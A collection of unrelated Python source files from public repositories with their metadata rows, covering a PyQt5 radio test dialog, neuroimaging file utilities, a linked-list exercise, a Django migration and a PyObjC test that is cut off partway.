f4c3838c07ae1aaefeab17865de863e3ebcd810e | b13c57843cb8886c6f5d630ca099ad9130b26f25 | /python/5일차/selenium04/model_company.py | 36df3d2849c1ab88b65e7e3bf0d5329748b8c358 | [] | no_license | schw240/07.27-12.1_CLOUD | 6b563318f7208b843a13634a1cf46206197d6dfc | 8b4dc2d31e5d2ba96bde143116aba3ba0dad7a49 | refs/heads/master | 2023-03-25T15:44:03.555567 | 2021-03-30T02:09:32 | 2021-03-30T02:09:32 | 282,791,349 | 4 | 0 | null | 2021-03-19T15:00:00 | 2020-07-27T04:10:56 | Jupyter Notebook | UTF-8 | Python | false | false | 411 | py | class Company:
def __init__(self, _symbol, _name, _last_sale, _market_cap, _ipo_year, _sector, _industry, _summary_quote):
self.symbol = _symbol
self.name = _name
self.last_sale = _last_sale
self.market_cap = _market_cap
self.ipo_year = _ipo_year
self.sector = _sector
self.industry = _industry
self.summary_quote = _summary_quote
| [
"user@email.mail"
] | user@email.mail |
869e40e7fc3dd44ef9bd59de24782b32a660ee84 | e79e8eeb1f7063ccc2b48354ed890d63b0aad632 | /fload/stream/pipeline/filter.py | b330d61a5825192b65e7c8dad01923dc96360bfe | [
"Apache-2.0"
] | permissive | kevenli/fload | c7741c2c5729e720a1a24da2cedbb88c8b38c50a | 56cdbe7732bc6bddad17cd767bdb3e5607ee60c8 | refs/heads/main | 2023-06-18T19:22:55.721927 | 2021-07-19T13:38:44 | 2021-07-19T13:38:44 | 378,568,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | from argparse import ArgumentParser
import re
from fload import Pipeline
class FilterPipeline(Pipeline):
field = None
regex = None
value = None
expression = None
def add_arguments(self, parser:ArgumentParser):
parser.add_argument('--field', required=True)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--value')
group.add_argument('--regex')
group.add_argument('--expression', '--exp')
def init(self, ops):
self.field = ops.field
self.regex = ops.regex
self.value = ops.value
self.expression = ops.expression
def process(self, item):
field_value = item.get(self.field)
if field_value is None:
return None
if self.regex:
field_value = str(field_value)
if re.search(self.regex, field_value):
return item
else:
return None
if self.value is not None:
compare_value = convert_type(self.value, type(field_value))
if compare_value == field_value:
return item
else:
return None
def convert_type(value, t):
return t(value)
| [
"pbleester@gmail.com"
] | pbleester@gmail.com |
024b564567774e5abf26b0a0070d43f4bc16f008 | 7d90d2ce27c6ee0af74391b09909edbd45fdc2f0 | /modules/VHF_radio/TEST2.py | 341f621d2c9d008f3bfab1a7ec1162f9f94641e6 | [] | no_license | gaoxingyu-hub/54testframework-master-e284 | d7ea0d4a715b65c8652430e963a86b9522a7237a | 57dd2197e7d91b8ad8fb2bd0e3503f10afa08544 | refs/heads/master | 2023-04-30T05:50:41.542402 | 2021-05-28T09:19:37 | 2021-05-28T09:19:37 | 309,922,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,377 | py | from PyQt5.QtCore import pyqtSlot, QPoint, Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDialog, QGraphicsItem
from PyQt5.QtCore import pyqtSignal
from PyQt5 import QtGui, QtWidgets, QtCore
import os
from constant_trans import TransConstants
from modules.VHF_radio.Ui_TEST2 import Ui_Dialog
from PyQt5.QtCore import pyqtSignal
from common.info import Constants
from PyQt5 import QtGui
from common.logConfig import Logger
from PyQt5.QtWidgets import QMessageBox
from modules.VHF_radio.VHF_radio_CONSTANT import ModuleConstants
logger = Logger.module_logger("DialogTest2")
class DialogTest2(QDialog, Ui_Dialog):
"""
Class documentation goes here.
"""
signalTest = pyqtSignal(object)
signalPrint=pyqtSignal(object)
signalFinish1 = pyqtSignal(str, object)
def __init__(self, parent=None):
"""
Constructor
@param parent reference to the parent widget
@type QWidget
"""
super(DialogTest2, self).__init__(parent)
self.setupUi(self)
self.state=''
self.test_result = test_results()
self.action = 'finish_all'
@pyqtSlot()
def on_pushButton_1_clicked(self):
"""
Slot documentation goes here.
"""
# TODO: not implemented yet
self.signalFinish1.emit("next", None)
self.close()
@pyqtSlot()
def on_pushButton_2_clicked(self):
if self.state=='2':
self.test_result.test_item=ModuleConstants.VHF_radio
self.test_result.test_condition=''
self.test_result.test_results=ModuleConstants.VHF_PWOER_PANNEL
self.test_result.test_conclusion='FAIL'
QMessageBox.information(self, TransConstants.tip_info, ModuleConstants.VHF_PWOER_PANNEL, QMessageBox.Ok)
elif self.state == '3':
self.test_result.test_item = ModuleConstants.system_load
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip, ModuleConstants.ssm_pannel, QMessageBox.Ok)
elif self.state=='4':
self.test_result.test_item = ModuleConstants.mianban_caozuo
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip,ModuleConstants.ssm_pannel, QMessageBox.Ok)
elif self.state=='27':
self.test_result.test_item = ModuleConstants.two_radio_yuyin
self.test_result.test_condition = ''
self.test_result.test_results = ModuleConstants.ssm_pannel
self.test_result.test_conclusion = 'FAIL'
QMessageBox.information(self, ModuleConstants.tip, ModuleConstants.ssm_pannel, QMessageBox.Ok)
self.signalTest.emit("test")
self.signalPrint.emit('print')
self.close()
def set_contents(self, title, contents,img_file_path ):
"""
set gui display information
:param title: dialog window title
:param contents: tips
:param img_file_path:image file full path
:return: none
"""
try:
self.setWindowTitle(title)
self.textBrowser_contents.setText(contents)
if img_file_path and img_file_path != "":
if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):
self.pixmap = QtGui.QPixmap(img_file_path)
self.pixmap = self.pixmap.scaled(600, 600,
Qt.IgnoreAspectRatio | Qt.SmoothTransformation)
self.label_img.setPixmap(self.pixmap)
self.label_img.setAlignment(Qt.AlignCenter)
except BaseException as e:
logger.error(str(e))
return
def set_state(self,state):
self.state=state
@pyqtSlot()
def closeEvent(self, event):
if self.action == 'finish_all':
self.signalFinish1.emit('finish_all', None)
event.accept()
#
class test_results:
def __init__(self):
self.test_item=''
self.test_condition=''
self.test_results=''
self.test_conclusion=''
| [
"gaoxingyu@example.com"
] | gaoxingyu@example.com |
27c1879ef95a03504331c3ea5097c25188272733 | cb58043d5470c3d54807f09a51a7592a5760b0d1 | /LinkedList/05-sum-lists-my.py | 776b4fded8a2cf8ed4e1393062fd2ef0db276dff | [] | no_license | Early-woods/Python_Coding_Practice | 11a5f8fb777ed7945cb76642eab21aa014af8463 | 5dd9ff2e131130f164605e88f5962c2b41e7513f | refs/heads/master | 2021-05-24T09:28:13.282045 | 2020-04-05T06:35:56 | 2020-04-05T06:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | """
# Sum two numbers that are represented with linked lists with decimal digits
# in reverse order of magnitude.
num1 = Node(1,Node(2,Node(3)))
num2 = Node(4,Node(9,Node(5)))
self.assertEqual(str(sum_lists(num1, num2)), "5,1,9")
"""
class Node:
def __init__(self, val, next=None):
self.val = val
self.next = next
def operate(a, b):
runner = Node(0)
head = runner
carry = 0
while a and b:
s = a.val + b.val + carry
carry = 1 if s>10 else 0
n = Node(s%10)
runner.next = n
runner = runner.next
a = a.next
b = b.next
if a and not b:
n = Node(0)
b = n
elif b and not a:
n = Node(0)
a = n
if carry:
n = Node(carry)
runner.next = n
return head.next
# a = Node(9,Node(2,Node(3, Node(4, Node(1)))))
a = Node(1,Node(2,Node(3)))
b = Node(4,Node(9,Node(5)))
head = operate(a, b)
while head:
print(head.val)
head = head.next
| [
"nidhi.bhushan123@gmail.com"
] | nidhi.bhushan123@gmail.com |
972c57aa4aab0906af4b69747461b1d1f4e9cb1d | 9c9b4759bb952c2b42b1fd0ed2a469eb8ad191bd | /neuro_pypes/utils/files.py | 2acca4f41a8cbb2f33d86181fcb126def8cc7ce1 | [
"Apache-2.0"
] | permissive | zuxfoucault/pypes | 1dfaa73ae722e001fc58639d32f6b2e435cd4504 | e88d27ebba842e8fa1f36b52ca12a0b9d5777e89 | refs/heads/master | 2020-06-20T13:04:11.541657 | 2018-10-23T09:27:53 | 2018-10-23T09:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,753 | py | # -*- coding: utf-8 -*-
"""
Helper functions to manage external files.
"""
import re
import os
from glob import glob
from functools import wraps
def get_vox_dims(volume):
import nibabel as nb
if isinstance(volume, list):
volume = volume[0]
nii = nb.load(volume)
hdr = nii.header
voxdims = hdr.get_zooms()
return [float(voxdims[0]), float(voxdims[1]), float(voxdims[2])]
def get_data_dims(volume):
import nibabel as nb
if isinstance(volume, list):
volume = volume[0]
nii = nb.load(volume)
hdr = nii.header
datadims = hdr.get_data_shape()
return [int(datadims[0]), int(datadims[1]), int(datadims[2])]
def get_affine(volume):
import nibabel as nb
nii = nb.load(volume)
return nii.affine
def niftiimg_out(f):
""" Picks a function whose first argument is an `img` or a sequence of imgs, processes its
data and returns a numpy array. This decorator wraps this numpy array
into a nibabel.Nifti1Image."""
import nibabel as nib
import nilearn.image as niimg
@wraps(f)
def wrapped(*args, **kwargs):
r = f(*args, **kwargs)
img = niimg.load_img(args[0])
return nib.Nifti1Image(r, affine=img.get_affine(), header=img.header)
return wrapped
def get_extension(filepath, check_if_exists=False, allowed_exts=None):
"""Return the extension of filepath.
Parameters
----------
filepath: string
File name or path
check_if_exists: bool
allowed_exts: dict
Dictionary of strings, where the key if the last part of a complex ('.' separated) extension
and the value is the previous part.
For example: for the '.nii.gz' extension I would have a dict as {'.gz': '.nii'}
Default: {'.gz': '.nii'}
Returns
-------
ext: str
The extension of the file name or path
"""
if allowed_exts is None:
allowed_exts = {'.gz': '.nii'}
rest, ext = os.path.splitext(filepath)
if ext in allowed_exts:
alloweds = allowed_exts[ext]
_, ext2 = os.path.splitext(rest)
if ext2 in alloweds:
ext = ext2 + ext
return ext
def add_extension_if_needed(filepath, ext):
"""Add the extension ext to fpath if it doesn't have it.
Parameters
----------
filepath: str
File name or path
ext: str
File extension
Returns
-------
filepath: str
File name or path with extension added, if needed.
"""
if not filepath.endswith(ext):
filepath += ext
return filepath
def remove_ext(filepath):
"""Removes the extension of the file.
Parameters
----------
filepath: str
File path or name
Returns
-------
filepath: str
File path or name without extension
"""
return filepath[:filepath.rindex(get_extension(filepath))]
def extension_duplicates(regexp_pair_list):
""" Return a new list with the pair items of `regexp_pair_list`
have all the '.nii' replaced by '.nii.gz'.
This is useful for the Datasink regexp_substitutions when
you don't know/care what extension the output image will have,
then you put all of them like:
"(r"/rc1[\w]+_corrected\.nii$", "/coreg_gm.nii")"
and then call this function to add the duplicates with modified
extension of these same pairs.
Parameters
----------
regexp_pair_list: list of 2-tuple of str
Returns
-------
mod_regexp_pair_list: list of 2-tuple of str
"""
def replace_ext(filepath):
return filepath.replace('.nii', '.nii.gz')
dups = [(replace_ext(pair[0]), replace_ext(pair[1]))
for pair in regexp_pair_list
if '.nii$' in pair[0]]
return dups
def rename(in_files, suffix=None):
"""Rename all the files in `in_files` adding the `suffix` keeping its
extension and basedir."""
import os.path as path
from nipype.utils.filemanip import (
filename_to_list,
split_filename,
list_to_filename
)
out_files = []
for idx, filename in enumerate(filename_to_list(in_files)):
base, name, ext = split_filename(filename)
if suffix is None:
new_name = name + ('_%03d' % idx) + ext
else:
new_name = name + suffix + ext
out_files.append(path.join(base, new_name))
return list_to_filename(out_files)
def find_files_in(dirpath, file_pattern, pat_type='fnmatch'):
""" Find files in `dirpath` without recursivity.
Parameters
----------
dirpath: str
Folder where to search for file names.
file_pattern: str
File pattern to be matched.
pat_type: str
The type of pattern in `file_pattern`.
Choices: 'fnmatch', 're.search', 're.match'.
Returns
-------
files: List[str]
List of paths to the files that match file_pattern.
`dirpath` is included in each of its items.
"""
if pat_type == 'fnmatch':
files = glob(os.path.join(dirpath, file_pattern))
elif pat_type == 're.search':
regex = re.compile(file_pattern)
files = [f for f in glob(os.path.join(dirpath, '*')) if regex.search(f)]
elif pat_type == 're.match':
regex = re.compile(file_pattern)
files = [f for f in glob(os.path.join(dirpath, '*')) if regex.match(f)]
else:
raise ValueError("Expected one of ('fnmatch', 're.search' or 're.match') for "
"`pat_type` parameter, got {}.".format(pat_type))
return files
def fetch_one_file(dirpath, file_pattern, file_extension=None, extra_prefix=None,
extra_suffix=None, pat_type='fnmatch'):
""" Return the unique file path in dirpath that matches fnmatch file_pattern.
Add the extra_prefix to try the search again, if the file_pattern finds more than one file.
Parameters
----------
dirpath:
file_pattern:
File pattern to be matched.
file_extension:
Extension of the file.
extra_prefix:
extra_suffix:
pat_type: str
The type of pattern in `file_pattern`.
Choices: 'fnmatch', 're.search', 're.match'.
Returns
-------
file_path: str
The path to the unique file that matches the conditions inside `dirpath`.
`dirpath` is included.
Raises
------
IOError
If `dirpath` doesn't exist or the list of returned files is empty.
ValueError
IF the choice for `pat_type` is not valid.
"""
if file_extension is not None:
file_fnmatch = file_pattern + file_extension
else:
file_fnmatch = file_pattern
files = find_files_in(dirpath, file_pattern, pat_type=pat_type)
if not files:
raise IOError('Expected at least one file that matched the '
'pattern {} in {}.'.format(file_fnmatch, dirpath))
if len(files) > 1:
if extra_prefix is None:
extra_prefix = ''
if extra_suffix is None:
extra_suffix = ''
if not extra_prefix and not extra_suffix:
raise IOError('Found more than one file that matched the '
'pattern {} in {}: {}'.format(file_fnmatch, dirpath, files))
else:
# TODO: be careful, this might only work with fnmatch
return fetch_one_file(dirpath, extra_prefix + file_pattern + extra_suffix,
file_extension=file_extension,
pat_type=pat_type)
return files[0]
def save_object(obj, filename):
""" Save `obj` in `filename` as a pickle."""
import pickle
with open(filename, 'wb') as output:
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
| [
"alexsavio@gmail.com"
] | alexsavio@gmail.com |
091ea0c55edb020988dfe03cb4fc99470836eeba | d52ea2ddba48e3c9e69f16e2e671002cb8a55c9d | /example/generic/get_system_status.py | 7f315dbc0fb55f74fc3abc1dcb9b374e5dd9a388 | [
"Apache-2.0"
] | permissive | GreatWei/huobi_Python | 3bf8583d5ef042099d9f2a2a2cedfaba1b5f03bb | 7ed1cccedd2aadc61716292300bd5ba3d1d45f9f | refs/heads/master | 2023-05-01T00:39:10.497133 | 2021-05-07T16:20:32 | 2021-05-07T16:20:32 | 312,221,461 | 0 | 0 | Apache-2.0 | 2021-03-07T16:30:43 | 2020-11-12T09:03:01 | Python | UTF-8 | Python | false | false | 219 | py | from huobi.client.generic import GenericClient
"""
GET https://status.huobigroup.com/api/v2/summary.json
"""
generic_client = GenericClient()
system_status = generic_client.get_system_status()
print(system_status)
| [
"devin0thinking@gmail.com"
] | devin0thinking@gmail.com |
8c39453a9b9e2ca5f055a0f3eb096d876a41a678 | 2da798f1b31c6482d8f47bce394d78ccfae9d279 | /raw_data_processing/GSE149069/SRS6514323/rules/secondary_analysis.smk | aa67208cf2937ffcf7478fd4828e3af2350c3375 | [] | no_license | mariafiruleva/sc_athero_itmo_master | 47378083201e0dbad327b98291bbf4e65d5d3cc5 | e3c8c1b55d61b551957da13d109c8dfb56aa3173 | refs/heads/main | 2023-05-20T11:49:23.202549 | 2021-06-07T16:26:15 | 2021-06-07T16:26:15 | 373,524,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | smk | rule run_analysis:
"""
Run Seurat processing using count matrix from the get_count_matrix rule.
"""
input: rules.get_count_matrix.output.count_mat
benchmark: "benchmarks/analysis.txt"
log: "logs/seurat.log"
output: h5ad=temp(f"{sample_id}.h5ad"), rda=f"{sample_id}.RData"
conda: "/mnt/tank/scratch/mfiruleva/scn/config/65ef9760.yaml"
shell: "Rscript scripts/analysis.R 2> {log}" | [
"mmfiruleva@gmail.com"
] | mmfiruleva@gmail.com |
3e51589882d154b4609ce603544d030222ba4c73 | 40bf8016b86d3869dbc694f12f99a8b4103ae41a | /eval_GCR_ri.py | 085e9e8e9656a2c433ca1f3345e9a8e616711470 | [] | no_license | lwj2018/islr-few-shot | 3bc8e71fca3bfa07ec57c01cac095587494a010b | 4ff900662ba16b402f6ccda032d022f527873c1a | refs/heads/master | 2021-05-26T09:03:05.235782 | 2020-06-10T06:59:17 | 2020-06-10T06:59:17 | 254,068,609 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | import os.path as osp
import time
import numpy as np
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from models.GCR_ri import GCR_ri
from models.gcrHCN_origin import gcrHCN
from models.Hallucinator import Hallucinator
from utils.ioUtils import *
from utils.critUtils import loss_for_gcr, loss_for_gcr_relation
from utils.trainUtils import train_gcr_relation
from utils.testUtils import eval_gcr_relation
from torch.utils.tensorboard import SummaryWriter
from utils.dataUtils import getValloader
from Arguments import Arguments
# Hyper params
epochs = 2000
learning_rate = 1e-3
# Options
shot = 1
dataset = 'isl'
# Get args
args = Arguments(shot,dataset)
store_name = 'eval_' + dataset + '_GCR_ri' + '_%dshot'%(args.shot)
summary_name = 'runs/' + store_name
checkpoint = '/home/liweijie/projects/islr-few-shot/checkpoint/isl_GCR_ri_5shot_best.pth.tar'
log_interval = 20
device_list = '0'
model_path = "./checkpoint"
start_epoch = 0
best_acc = 0.00
# Use specific gpus
os.environ["CUDA_VISIBLE_DEVICES"]=device_list
# Device setting
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Use writer to record
writer = SummaryWriter(os.path.join(summary_name, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
# Prepare dataset & dataloader
val_loader = getValloader(dataset,args)
model_cnn = gcrHCN().to(device)
# model_gen = Hallucinator(args.feature_dim).to(device)
model = GCR_ri(model_cnn,train_way=args.train_way,\
test_way=args.test_way, shot=args.shot,query=args.query,query_val=args.query_val,f_dim=args.feature_dim).to(device)
# Resume model
if checkpoint is not None:
start_epoch, best_acc = resume_gcr_model(model, checkpoint, args.n_base)
# Create loss criterion & optimizer
criterion = loss_for_gcr_relation()
# Start Evaluation
print("Evaluation Started".center(60, '#'))
for epoch in range(start_epoch, start_epoch+1):
# Eval the model
acc,_ = eval_gcr_relation(model,criterion,val_loader,device,epoch,log_interval,writer,args)
print('Batch acc on isl: {:.3f}'.format(acc))
print("Evaluation Finished".center(60, '#')) | [
"lwj19970331@gmail.com"
] | lwj19970331@gmail.com |
b8af9e711e28d5820cf856417659f62244951f7c | b739fefa06d46a60fe053f7fe0fe2c62a52242b2 | /constants/object_types.py | 115042d2d8836f8dcc2515a5fac8eb3ecab694b1 | [] | no_license | icorso/gkr-web-tests | c59d3b0f7e371e887c6699cd09b6a87a71dd762e | fdf25ad700d75230f1af74b646a6a8a18f3d0b18 | refs/heads/master | 2021-01-13T05:15:37.913759 | 2017-02-08T07:44:04 | 2017-02-08T07:44:04 | 81,296,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # coding=utf-8
from enum import Enum
class ObjectTypes(Enum):
STROI_OBJECT = ('Объект капитального строительства', 1)
ZEM_UCHASTOK = ('Земельный участок', 2)
DOMOVLADENIE = ('Домовладение', 3)
ZEMLI_SH_NAZNACHENIYA = ('Земли сельхоз назначения', 4)
def __init__(self, name, id_):
self.name = name
self.id = id_
def __repr__(self):
return "<ObjectType (name='%s', id='%s')>" \
% (self.name, self.id)
def __str__(self):
return self.name
def name(self):
return self.name
def id(self):
return self.id
| [
"icorso@yandex.ru"
] | icorso@yandex.ru |
ed931e86f479edeb22c132706c3247b57f07bbe1 | bd08d0532f20b7285b437c9bf620de1bbcd5b9ea | /aalh_iit_industry_001/debug-find-duplicates.py | 50978835bcfc71ce41df7112a37c6f6c58eed258 | [
"Unlicense"
] | permissive | johndewees/iitmigration | a9e8a31ba6ceb541ce12c22fd612596cc243dbca | 4dadfbecda719d6e7d60af076a231aedec3c862f | refs/heads/main | 2023-03-14T17:06:58.777683 | 2021-03-27T20:44:58 | 2021-03-27T20:44:58 | 320,086,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | from openpyxl import load_workbook
filename = 'aalh_iit_industry_001.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 43
maximumcol = 43
minimumrow = 7
maximumrow = 474
iterationrow = 7
identifiercol = 25
filenamecol = 43
countfilename = dict()
countidentifier = dict()
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
for cell in row:
#print(iterationrow)
testvar1 = ws.cell(row=iterationrow, column=filenamecol).value
#print(testvar1)
if testvar1 not in countfilename:
countfilename[testvar1] = 1
else:
countfilename[testvar1] = countfilename[testvar1] + 1
for cell in row:
testvar2 = ws.cell(row=iterationrow, column=identifiercol).value
#print(testvar2)
try:
if testvar2 not in countfilename:
countidentifier[testvar2] = 1
else:
countidentifier[testvar2] = countidentifier[testvar2] + 1
except:
continue
iterationrow = iterationrow + 1
for file1 in countfilename:
if countfilename[file1] > 1:
print('Duplicate File Name:',file1, countfilename[file1])
for file2 in countidentifier:
if countidentifier[file2] > 1:
print('Duplicate Identifier:',file2, countidentifier[file2])
print('*Duplicate Check Completed*')
#print(countfilename)
#print(countidentifier) | [
"noreply@github.com"
] | johndewees.noreply@github.com |
d5e10c4fcdfc66ab5ce65924e15fb38eeb866c66 | 3597ecf8a014dbd6f7d998ab59919a94aff8011d | /api-web/src/www/application/modules/treatment_block_pub_version/components.py | 750b0345de3b8f412e65119f3a59b7b45bfa4d32 | [] | no_license | duytran92-cse/nas-genomebrowser | f42b8ccbb7c5245bde4e52a0feed393f4b5f6bf1 | d0240ad5edc9cfa8e7f89db52090d7d733d2bb8a | refs/heads/master | 2022-10-24T05:26:01.760241 | 2020-06-14T19:01:35 | 2020-06-14T19:01:35 | 272,264,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | from application.models import *
class TreatmentBlockPublicationVersionHelper(object):
def load_publications(self, id):
publications = []
rows = TreatmentBlockPublication.objects.filter(treatment_block_version_id=id)
if rows:
for r in rows:
publications.append({
'id': r.id,
'pmid': r.pmid,
'doi': r.doi,
'pmc': r.pmc,
'title': r.title,
'authors': r.authors,
'journal': r.journal
})
return publications
| [
"thanh.tran@etudiant.univ-lr.fr"
] | thanh.tran@etudiant.univ-lr.fr |
e73d3fd602f0549bdec2e9c66788186f234c4bf6 | 8682d6d60aa2f4c7a17300c2d935c45e972d00e2 | /media.py | ef29b6cb5b8a6e7dc52c5d1a09d99de6e03b1bcb | [] | no_license | coursepractice/movie-trailer-website | cf941f266ec154df5363e15b4916ee8efed6374f | 22ced122e3fddcb8f680727676519a0a648326d6 | refs/heads/master | 2021-01-10T13:14:15.478889 | 2015-06-04T22:31:23 | 2015-06-04T22:31:23 | 36,898,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | class Movie():
#constructor, assigns values to each instance variable
def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_youtube_url = trailer_youtube
| [
"root@ip-10-47-174-141.ec2.internal"
] | root@ip-10-47-174-141.ec2.internal |
a9bfe1e818e4c241e4e168f26f9386e2173e1dfe | 38466811d0e12a8f755bae58d7244622ef5f4d9b | /problems_analysis/min_depth_bin_tree.py | 4570a069796dcb336a243373d87b121fb64c1f80 | [] | no_license | andysitu/algo-problems | 4ab5a2b6591f0c0d84174b69598f30bc354ff8aa | 35c88dc747e7afa4fdd51d538bc80c4712eb1172 | refs/heads/master | 2023-06-24T15:55:39.019652 | 2021-02-26T20:31:07 | 2021-02-26T20:31:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | """
Similar to the max depth bin tree except you are taking
the minimum instead of the max. If you find the depth of
the left child, then you can start the calculation of the
right child if it exceeds that min depth or vice versa.
This would require the recursive approach.
Runtime O(n) ; Space O(n)/O(1) depending on how recursion is seen
"""
"""
Another approach is to only explore the node with the min depth.
This way, as soon as you approach the first leaf node, it would be
the minimal height. A queue would work with a fifo approach while
If it's a balanced tree, then you would have to approach all the nodes,
but any approach would have to do so anyway if you want to explore
the entirety of the nodes and ensure correctness.
""" | [
"and.situ@gmail.com"
] | and.situ@gmail.com |
d8044123f06fe27910f39c49e03d3f92e4d67acb | 90bf2ffa7ee75ff266238bffd1b3edc6f83a2bbe | /WebApp_DataSupport/TSA_person_database/step1_createdb.py | de66e7b554beeff8bacd9e2701981525a69c284d | [] | no_license | MacHu-GWU/EFA-finished-projects | f7cf5e0f765aba78db2c1dd8729accff443aa6ee | 88c93b0e1c5880b710c11ef93254a732573c92ee | refs/heads/master | 2021-03-13T00:11:15.580259 | 2014-10-06T15:20:15 | 2014-10-06T15:20:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | ##coding=utf8
import faker
import sqlite3
from _tool_schema import get_schema
conn = sqlite3.connect(r'C:\Users\Sanhe.Hu\Data_warehouse\TSA\TSA_person.db')
c = conn.cursor()
''' CREATE TABLE '''
try:
cmd = \
"""
CREATE TABLE person
(id INTEGER PRIMARY KEY NOT NULL,
lastname TEXT,
firstname TEXT,
social_network TEXT,
International_Terrorist_Watch_List INTEGER,
National_Terrorist_Watch_List INTEGER,
National_Law_Enforcement INTEGER,
Local_Law_Enforcement INTEGER,
IRS_or_other_Federal_Finance_Company INTEGER,
Face_Match_with_Picture_DB INTEGER,
Cash_Payment_Same_Day INTEGER,
Immediate_Family INTEGER,
Extented_Family INTEGER,
Place_of_Worship INTEGER,
basic_score REAL,
bonus_score REAL,
score INTEGER)
"""
c.execute(cmd)
conn.commit()
conn.close()
except:
print 'cannot create table!'
db = get_schema(r'C:\Users\Sanhe.Hu\Data_warehouse\TSA\TSA_person.db')
print db
print db.person | [
"husanhe@gmail.com"
] | husanhe@gmail.com |
25650425821f60b09b90d551b0bb2a43248b7953 | b1ea051f9192e5fef2ca724a72c287214fcacf15 | /payment/migrations/0002_auto_20190223_1212.py | 6d8110a08b1642ec49868bca3ab5336b96755ccd | [] | no_license | pacifi/rest-bank | 8fbab44eff770db25beb5a9093ac95e608ec3131 | 90c5eebcf901a3ada09f094e49e50e23a0363422 | refs/heads/master | 2020-04-20T00:11:23.555974 | 2019-02-26T04:10:33 | 2019-02-26T04:10:33 | 168,516,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.1.7 on 2019-02-23 17:12
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('payment', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='payment',
name='id',
field=models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True),
),
]
| [
"pacifi.bnr@gmail.com"
] | pacifi.bnr@gmail.com |
93d29e65d3fbdd674ff739f14fe376821b95c1c0 | b78ef082335b0a901b3f028746055fc6308990a2 | /Algorithms/Leetcode/430 - Flatten a Multilevel Doubly Linked List.py | 8982138ae41e53b53bbc68d2e999a350da4c9afc | [] | no_license | timpark0807/self-taught-swe | 1a968eab63f73cea30ef2379ffab53980743ed1a | bbfee57ae89d23cd4f4132fbb62d8931ea654a0e | refs/heads/master | 2021-08-14T23:31:14.409480 | 2021-08-10T06:36:06 | 2021-08-10T06:36:06 | 192,797,733 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | """
# Definition for a Node.
class Node(object):
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution(object):
def flatten(self, head):
"""
:type head: Node
:rtype: Node
"""
if not head:
return head
stack = [head]
before = None
while stack:
curr = stack.pop()
if before:
before.next = curr
curr.prev = before
if curr.next:
stack.append(curr.next)
if curr.child:
stack.append(curr.child)
curr.child = None
before = curr
return head
| [
"timpark0807@gmail.com"
] | timpark0807@gmail.com |
3ed274764dddc44f7d777343c021925a74e26725 | fdcc67ab28dccb89b69dc647eb996bd7acfcd791 | /themusic/wsgi.py | a82c793dbe6afd976dd791570e69391e231168b0 | [] | no_license | moses-mugoya/Personal-Music-Upload-System | daaffada181067a99fe7d484f132f72c0bcace25 | b3a03e714c792968d9e83b2c9a57cc13de00aeca | refs/heads/master | 2021-07-15T06:00:49.679448 | 2017-10-20T20:39:14 | 2017-10-20T20:39:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for themusic project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "themusic.settings")
application = get_wsgi_application()
| [
"mosesmugoya31@gmail.com"
] | mosesmugoya31@gmail.com |
205539d4394c8835228d7e3e7d8bdb50cfde214c | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-Cocoa/PyObjCTest/test_nsxmlparser.py | b4e8b4cc6cbd578b852147807948fc93a25ac26a | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,270 | py | from Foundation import *
from PyObjCTools.TestSupport import *
class TestNSXMLParser(TestCase):
def testConstants(self):
self.assertEqual(NSXMLParserInternalError, 1)
self.assertEqual(NSXMLParserOutOfMemoryError, 2)
self.assertEqual(NSXMLParserDocumentStartError, 3)
self.assertEqual(NSXMLParserEmptyDocumentError, 4)
self.assertEqual(NSXMLParserPrematureDocumentEndError, 5)
